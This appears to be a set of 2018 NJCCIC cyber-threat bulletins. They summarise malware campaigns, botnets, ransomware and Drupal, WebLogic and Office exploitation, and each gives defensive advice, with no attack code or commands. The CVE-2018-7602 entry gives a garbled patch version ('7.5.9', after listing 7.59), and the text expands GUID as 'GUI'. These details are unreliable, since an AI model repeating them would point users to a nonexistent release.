Cryptocurrency-Mining Malware Infects 500,000 Machines

Qihoo 360 Total Security researchers discovered a new cryptocurrency-mining malware that crashes the system if a user attempts to remove its mining process. Dubbed WinstarNssmMiner, the malware has been leveraged in over half a million attacks in the past three days alone. Once executed, the malware creates two processes on the infected device, a mining function using the XMRig Monero miner and another process used for detecting antivirus products. If the malware detects a reputable antivirus solution, it will stop the infection attempt. The NJCCIC recommends all users review the Qihoo 360 Total Security blog for more information. Additionally, install a reputable antivirus/ antimalware solution on all systems to protect against this and similar threats. 

DDoS Attacks Bypassing Mitigation Solutions via the UPnP Protocol

Threat actors are circumventing DDoS (distributed denial-of-service) mitigation solutions by taking advantage of the Universal Plug and Play (UPnP) protocol to mask the source port of packets sent during a DDoS flood attack, according to DDoS mitigation firm Imperva. These attacks hide their source IPs using UPnP and then leverage DNS and NTP protocols during the DDoS flood. The NJCCIC recommends reviewing the Imperva report and disabling UPnP support for networks not using the feature.

Vega Stealer Malware Targets User Credentials and Credit Card Numbers

A new malware campaign is targeting Google Chrome and Mozilla Firefox browsers to steal credentials and other sensitive data, according to researchers at Proofpoint. Dubbed “Vega Stealer,” the malware is being spread via phishing emails targeting marketing, advertising, public relations, retail, and manufacturing companies. Attached to the email is a word document containing malicious macros that, when enabled, download the Vega Stealer malware. Once the system is infected, the malware steals passwords, saved credit card data, autofill profile information, cookies from Chrome, and specific passwords and keys from Firefox. Additionally, Vega Stealer can take a screenshot of the victim’s system and search for files on the system that end in .doc.docx.txt.rtf.xls.xlsx, or .pdfand, if found, send these files to the threat actor’s Command and Control (C2) server. Proofpoint believes that this campaign could be connected to the same threat actors behind the Ursnif banking Trojan. The NJCCIC recommends Chrome and Firefox users and administrators review the Proofpoint report and educate end users about this and similar threats, reminding them never to click on links or open attachments delivered with unexpected or unsolicited emails. Additionally, if end users have received and taken action on these emails, isolate the affected systems from the network and perform a full system scan using a reputable anti-malware solution. Proactively monitor and change passwords to any financial, personal, or business accounts accessed on infected systems and enable multi-factor authentication where available.

Kitty Malware Infecting Vulnerable Drupal Sites

A new malware targeting vulnerable Drupal sites is installing a cryptocurrency-miner and a PHP backdoor onto compromised servers. Dubbed “Kitty” by security researchers from Imperva, the malware exploits the Drupalgeddon2 vulnerability in Drupal sites that allows a remote attacker to execute malicious code. Once an attacker gains access to the server, the popular XMRig Monero miner is installed and begins using the compromised server’s resources to mine the cryptocurrency. Along with the cryptocurrency-miner, a backdoor is installed, and the threat actor creates a time-based job scheduler that re-downloads the malicious script every minute. This process allows the malware to re-infect a server even if updates are attempted. The NJCCIC recommends all Drupal site owners and administrators review the Imperva security blog for more information, ensure all Drupal sites are up-to-date with the most recent patches, run a full system scan, and follow the recovery instructions, if necessary. Additionally, monitor network activity for anomalies indicative of cryptocurrency-mining activity. End users are encouraged to use web browsers that proactively block cryptocurrency-mining scripts or install a reputable ad-blocking, script-blocking, and coin-blocking extension in their current browser.

Gold Galleon Threat Group Targets Maritime with BEC Scheme

A threat group operating out of Nigeria, dubbed “Gold Galleon,” is targeting the global maritime shipping industry with a business email compromise (BEC) campaign – a type of social engineering scheme. The campaign involves sending targets fraudulent invoices and financial documents, using a combination of malware and social engineering techniques to steal corporate email account credentials and use these accounts to send fake payment requests and steal millions of dollars. Researchers estimate Gold Galleon attempted to steal $3.9 million between June 2017 and January 2018 alone. The maritime industry is a particularly attractive target given the amount of international business and financial transactions and communications that commonly occurs. Poor cybersecurity protections also allow threat actors to be successful even when employing unsophisticated tactics and off-the-shelf tools. The NJCCIC recommends all users and administrators in the maritime industry review the Secureworks report on Gold Galleon and organizations from all industries are encouraged to educate end users on the threat of BEC and similar social engineering schemes, implement account security features such as multi-factor authentication, observe strict wire transfer policies, and verify vendors and clients prior to conducting financial transactions. Organizations are also encouraged to implement a defense-in-depth cybersecurity strategy, employ the Principle of Least Privilege, and keep hardware and software up-to-date. 

Russian APT Group Fancy Bear (APT28) Distributes Malicious Versions of LoJack Software

Researchers at Arbor Networks detected modified versions of legitimate LoJack applications that appear to be associated with the Russian APT Group Fancy Bear, also tracked as APT28 and Sofacy. LoJack software is used by organizations and individuals to track and locate devices in the case of theft and, by default, comes with a built-in persistence system. The altered versions contain minor modifications in the application’s binary which enable connections to remote C2 domains believed to be associated with Fancy Bear operations. Because the alterations are minor, many antivirus systems do not detect the affected software versions. Although distribution methods are currently unknown, the malicious LoJack applications are likely distributed via spear-phishing emails crafted to trick recipients into downloading and installing LoJack. The NJCCIC recommends network administrators review the Arbor Networks report and scan their networks for associated IoCs. We also strongly recommend that all email users maintain awareness of emerging phishing campaigns and avoid clicking on links or opening attachments delivered with unexpected or unsolicited emails. If any end users have taken action on emails from this campaign, isolate the affected system from the network immediately and perform a full system scan using a reputable anti-malware solution. Proactively monitor and change passwords to any financial, personal, or business accounts accessed on infected systems and enable multi-factor authentication where available.

PoC Code Can Crash a Windows System Via a USB Drive

Proof-of-concept (PoC) code was published on GitHub that can be used to crash most Windows operating systems in seconds by exploiting a vulnerability in Microsoft’s handling of NTFS (New Technology File System) images. Placing a malformed NTFS image on a USB drive and plugging it into a targeted Windows system, including those in locked mode, will crash the system and result in the Blue Screen of Death. Even systems with auto-play disabled for removable media will crash when Windows Defender scans the USB drive. The researcher also claims the code could be delivered through malware. While the code works on most Windows operating systems, the vulnerability it exploits appears to be fixed for the most recent Windows 10 release. Because of these risks, the NJCCIC recommends organizations minimize, or possibly eliminate, the use of USB devices and similar removable media. To defend against malware, organizations are encouraged to implement a defense-in-depth cybersecurity strategy, employ the Principle of Least Privilege, establish strong identity and access management controls, including multi-factor authentication, and keep hardware and software up-to-date.

FacexWorm Malware Spreading via Facebook Messenger

Trend Micro researchers have discovered a new malware variant spreading to Facebook users. Dubbed FacexWorm, the malware is distributed via a malicious link in a Facebook Messenger chat. If clicked, the link redirects users to a fake YouTube page where they are instructed to install a YouTube-themed Chrome extension in their browser. When downloaded, the extension conducts a number of malicious activities. The malware can steal login credentials when the user accesses certain sites and sends those credentials to C2 servers controlled by the threat actor. If the victim accesses any of the 52 cryptocurrency-related sites hardcoded into the extension, they are redirected to a web page that asks them to verify their account by sending Ether cryptocurrency to an account controlled by the threat actor. If any transactions are performed on these sites, FacexWorm can replace the recipient’s cryptocurrency wallet address with one linked to the threat actor. The extension also injects an obfuscated Coinhive script onto the infected system, using the system’s CPU resources to mine cryptocurrency. This campaign is perpetuated by using the compromised user’s Facebook account to send their friends the same malicious link via Facebook Messenger. The NJCCIC recommends Facebook users review the Trend Micro report and exercise increased caution when using social media platforms and avoid clicking on links in unexpected messages until their legitimacy has been verified by the message sender. Additionally, we recommend users and administrators install browser extensions directly from official browser stores, run updated antivirus software, proactively block outbound connections to the domains coinhive[.]com and coin-hive[.]com, and monitor network activity for anomalies that indicate cryptocurrency-mining activity. 

Remote Code Execution Vulnerability in Drupal Exploited in the Wild

Just over a week after threat actors began exploiting a critical Drupal vulnerability, dubbed “Drupalgeddon2,” a separate critical vulnerability (CVE-2018-7602) in Drupal was disclosed by the Drupal CMS team on April 25 and then exploited just five hours later. Successful exploitation of this vulnerability could allow a remote threat actor to execute code and take complete control of the compromised site. Drupal Core versions prior to 7.59, 8.5.3, and 8.4.8 are affected; there are at least 2,700 Drupal-powered sites hosted in New Jersey that may be vulnerable if left unpatched. The NJCCIC recommends all Drupal site owners and administrators review the Drupal Core Security Advisory and update their sites to version 7.5.9 or 8.5.3 as soon as possible. Although Drupal 8.4.x versions are no longer supported by Drupal, version 8.4.8 was released to address the vulnerability.

Stresspaint Malware

Researchers at Radware discovered a trojan inside the free Windows application “Relieve Stress Paint.” Dubbed “Stresspaint,” the malware is distributed via Facebook and email spam messages directing users to аоӏ[.]net, a website domain impersonating the real aol[.]net by using Unicode characters. When converted to punycode, the website domain actually spells out 80a2a18a[.]net. If a user downloads the application from this site, they receive a legitimate drawing tool; however, the app also runs malicious files in the background, allowing the malware to set a Windows registry key that executes a .exe file every time the device boots to maintain persistence. The malware collects details on the user’s Facebook account, Chrome login data and session cookies, and their Globally Unique Identifier (GUI), and sends this information to the threat actor’s C2 server. The NJCCIC recommends users review the BleepingComputer article, verify the URL of websites they visit to ensure their legitimacy, avoid downloading applications and other software from third-party sites, and run an up-to-date antivirus solution on all devices.


Vulnerability CVE-2018-7600 discovered in March by the Drupal CMS team, dubbed “Drupalgeddon2,” is being exploited by threat actors who are using the flaw to infect servers with backdoor scripts and cryptocurrency-mining software. In early April, a Russian security researcher published proof-of-concept (PoC) code for the vulnerability, sparking scans for vulnerable sites within hours of publication. Information security researchers have also reported that botnets controlled by criminal groups are exploiting the vulnerability. There are at least 3,300 Drupal-powered sites hosted in New Jersey. Site administrators are advised to ensure they are running patched version 7.58 or 8.5.1. The NJCCIC recommends all Drupal site owners and administrators review the Drupal Core highly critical public service announcement and follow the recovery instructions if necessary, review the previous NJCCIC advisory on Drupalgeddon2, and update their sites to the most recent patched version immediately.

FormBook Malware

Researchers at Menlo Security recently uncovered a new campaign targeting US and Middle East financial and information service sectors. This malware campaign delivers FormBook to targets via emails containing Microsoft Word attachments and does not require the recipient to enable macros in order to start malicious activities. FormBook bypasses security measures as the malicious component is hosted on a remote server and the document delivered to victims does not contain active malicious code or shellcode. This malware exploits CVE-2017-8570, a vulnerability in Microsoft Office that allows for execution without enabling macros, and it also utilizes design flaws in the document formats .docx and RTF. Microsoft patched this vulnerability in July of 2017. The NJCCIC recommends users and administrators ensure all Microsoft Office products are up-to-date with the latest patches.

NetSupport Manager Remote Control Software Delivered in Malicious Campaign

FireEye recently identified a new malicious operation that leverages compromised websites to install the NetSupport Manager remote control software on systems, unbeknownst to users. When visited, these websites prompt the user to download and install the NetSupport Manager executable disguised as updates for popular applications such as Adobe Flash, Chrome, and Firefox. Since this remote access software is a legitimate tool commonly used by administrators to gain authorized remote access to computers on a network, it may evade antivirus detection when delivered by this campaign, especially if the tool has been whitelisted in the environment. The NJCCIC recommends all network administrators review FireEye’s report for additional information and scan all systems for the associated indicators of compromise (IoCs). Current users and administrators of the NetSupport Manager remote control software are encouraged to audit all instances of the software on their network to ensure secure configurations and help differentiate between legitimate and potentially malicious installations.

Matrix Ransomware Distributed Via Compromised Remote Desktop Services

MalwareHunterTeam recently discovered two new variants of the Matrix ransomware that are distributed via compromised Remote Desktop services. First detected in 2016, Matrix was previously delivered to victims through an exploit kit known as RIG. In this current campaign, threat actors scan for machines that have their Remote Desktop Protocol (RDP) ports open and exposed to the internet. Once a vulnerable system is located, a brute-force attack is launched against the login credentials used for remote access. If the attack is successful, Matrix ransomware will be installed and executed on the target computer. Despite some differences, both new versions of Matrix encrypt filenames and unmapped network shares, clear Volume Shadow Copies, and display status windows during the encryption process. Encrypted filenames will be appended with [Files4463[@]tuta[.]io] or [RestorFile[@]tutanota[.]com], depending on which variant infects the machine. The NJCCIC recommends all users and administrators running Remote Desktop services review the NJCCIC Threat Analysis titled Remote Access: Open Ports Create Targets of Opportunity, Undue Risk and take proactive steps to reduce their exposure to network compromise as a result of insecure remote access configurations. We also recommend all members and organizations download our PDF titled Ransomware: Risk Mitigation Strategies to learn how to protect data, systems, and networks from ransomware.

Bing Search Results Display Malicious Chrome Advertisements

Lawrence Abrams of Bleeping Computer reports observing the Bing search engine display Google Chrome advertisements designed to redirect users to a website that delivers installers for adware and Potentially Unwanted Programs (PUPs). These misleading advertisements appear as a top result when a user searches for the phrase “chrome download” using Bing. Although the advertisements appear to lead to Google’s authentic website, the ads actually direct users to the site www[.]googlechrome2018[.]net, designed to lure users into downloading an InstallCore bundle masquerading as ChromeSetup.exe. If users already have Chrome installed on their system, they will be prompted to download and install a “Search Manager” extension. If the Chrome extensions are installed, additional prompts will appear for Chrome extensions, anti-malware PUPs, and other programs that may negatively impact device performance and security. The NJCCIC recommendsinstalling applications from the official Chrome Web Store by directly typing the web address into the URL field. If users have downloaded and installed the affected programs, we recommend uninstalling them immediately and scanning affected devices with a reputable antivirus solution.

At least 1,000 Magento-Powered Sites Compromised

E-commerce sites running on the Magento platform are being compromised by profit-motivated criminals via brute-force attacks against administrator panels using common and default Magento credentials. So far, at least 1,000 Magento sites have been impacted and infected with malicious scripts designed to steal payment card data or deliver additional malware, according to security researchers at Flashpoint. The compromised sites are being exploited to mine cryptocurrency, log payment card data via card-scraping malware such as AZORult, and to redirect visitors to malicious sites that attempt to install malware onto systems via a fraudulent Adobe Flash update. The majority of the identified compromised sites are associated with the education and healthcare sectors and hosted on servers in the US and Europe. At least 365 sites hosted on servers within New Jersey are running Magento and could potentially become targets of this attack if not secured with unique, lengthy, and complex administrator credentials. The NJCCIC recommends all administrators of Magento-powered sites review the Flashpoint blog for additional information, including indicators of compromise (IoCs) and the associated Yara rule, and follow the recommendations outlined in the Magento Security Best Practices guide to secure their websites against this and other attacks.

Destructive Trojan SHARPKNOT Used by North Korean APT Group

On March 28, the National Cybersecurity and Communications Integration Center (NCCIC) released a Malware Analysis Report (MAR) detailing analysis from the US DHS and FBI on a newly identified trojan variant dubbed “SHARPKNOT,” used in cyber operations conducted by North Korean advanced persistent threat (APT) group HIDDEN COBRA, aka Lazarus Group. The malware targets systems running Windows OS and is executed via the command line. Once executed, the malware first attempts to disable the “System Event Notification” and the “Alerter” services, the latter is only present in End-of-Life (EOL) operating systems Windows XP and Windows 2003. The malware then overwrites and deletes the Master Boot Record (MBR) and deletes files on mapped network shares and physically connected storage devices. Once the malware has deleted these files, the system is rebooted and left inoperable. The NJCCIC recommends those who could be considered targets for North Korean APT cyber operations review the NCCIC MAR for more information on the SHARPKNOT trojan, scan their network using the YARA rule and Indicators of Compromise (IoCs) provided, and add the STIX file to their threat intelligence sharing platform. If your organization has been impacted by the activity outlined in the MAR, the NJCCIC recommends immediately removing the affected systems from your network and contacting the NJCCIC via the Cyber Incident Report Form or by calling 609-963-6900 ext. 7865. Organizations are strongly encouraged to implement a defense-in-depth cybersecurity strategy; employ the Principle of Least Privilege; keep antivirus, hardware, and software up-to-date; disable unnecessary services on workstations and servers; and establish strong identity and access management controls, including multi-factor authentication. Additionally, users and administrators can better protect their MBR by installing MBR Filter, a Windows disk filter released by Cisco Talos that blocks write access to the MBR, available on GitHub. The NJCCIC makes no claim as to the effectiveness of this tool and users are advised to exercise caution when downloading and installing any software from the internet.

GhostMiner Fileless Malware Targets WebLogic Servers

Oracle WebLogic WLS-WSAT vulnerability CVE-2017-10271 is currently being exploited to deliver a fileless cryptocurrency miner to vulnerable servers. Security researchers with Minerva Labs detected the malware, dubbed GhostMiner, which uses two PowerShell scripts to infect victims with a variant of the XMRig Monero miner. Once executed, GhostMiner will terminate any other cryptocurrency miners detected on the same host. At the time of writing, GhostMiner has reportedly generated 1.03 Monero, the equivalent of approximately $200 USD. The NJCCIC recommends reviewing the Minerva report for additional information and Indicators of Compromise (IoCs). Additionally, we recommend all users and administrators of systems using Oracle products review their website for any necessary updates. For additional information about fileless intrusions, please review the NJCCIC Threat Analysis product titled Fileless: Evasive Intrusion Tactics Pose Challenge for Network Defense.

Malicious Apps Delivering Adware Found in Google Play Store

A SophosLabs researcher discovered two new Android malware variants hidden inside apps available for download in the Google Play store. The first variant, dubbed “Guerilla,” was found in 15 seemingly-legitimate apps and is described as a fully functioning backdoor, allowing threat actors to download additional malware onto infected devices. The threat actors push aggressive ad-click plugins to the victims, covertly generating ad revenue for the perpetrators. The second malware, dubbed “HiddnAd,” was hidden in seven different apps, including six QR code-reading apps and one “smart compass” app. The malicious apps were downloaded hundreds of thousands of times and bypassed security in the Play store by delaying malicious activity until six hours after installation. Once the malicious activity began, pop-up advertisements would display on the victim’s device as well as Android notifications containing links that, if clicked, generated ad revenue for the threat actors. Google has since removed the infected apps from the Play store. The NJCCIC recommends Android users review the Sophos reports on the Guerilla and HiddnAd malware variants for a list of affected apps and, if installed, immediately remove the apps from the device. Additionally, we recommend running a reputable antivirus application on all devices, refrain from downloading apps that require excessive device permissions, promptly remove apps that execute unexpected or unwanted behavior, and keep all device software and apps updated to the most recent version.

GoScanSSH Targets Linux-Based SSH Servers

A new malware variant, dubbed GoScanSSH by Cisco Talos researchers, attempts to compromise Linux-based SSH servers that are exposed to the internet and join them to a botnet. Written in the Go programming language, GoScanSSH uses a previously infected device to scan randomly generated IP addresses for open SSH ports, attempts to establish an SSH connection with an identified target, and then gathers information about the domains associated with it. Researchers have determined that GoScanSSH compares these associated domains and IP addresses with an internal blacklist to avoid compromising military and government-based servers. When the malware finds a viable target with an open SSH port, an SSH credential brute-force attack is initiated using a word list containing over 7,000 common username and password combinations, mostly comprised of weak or default device credentials. If a credential match is found and access can be obtained, a unique GoScanSSH malware binary will then be installed on the system. After the malware gathers information on the infected device, it begins searching for new devices to compromise. The NJCCIC recommends administrators of Linux-based systems with open and publicly exposed SSH ports review the Talos report for additional information and Indicators of Compromise (IoCs), change any and all default account credentials, ensure systems have unique and complex account credentials, and close port 22 if it is not needed. If SSH is needed in your environment, consider implementing IP whitelisting and a multi-factor authentication solution to protect against brute-force attacks.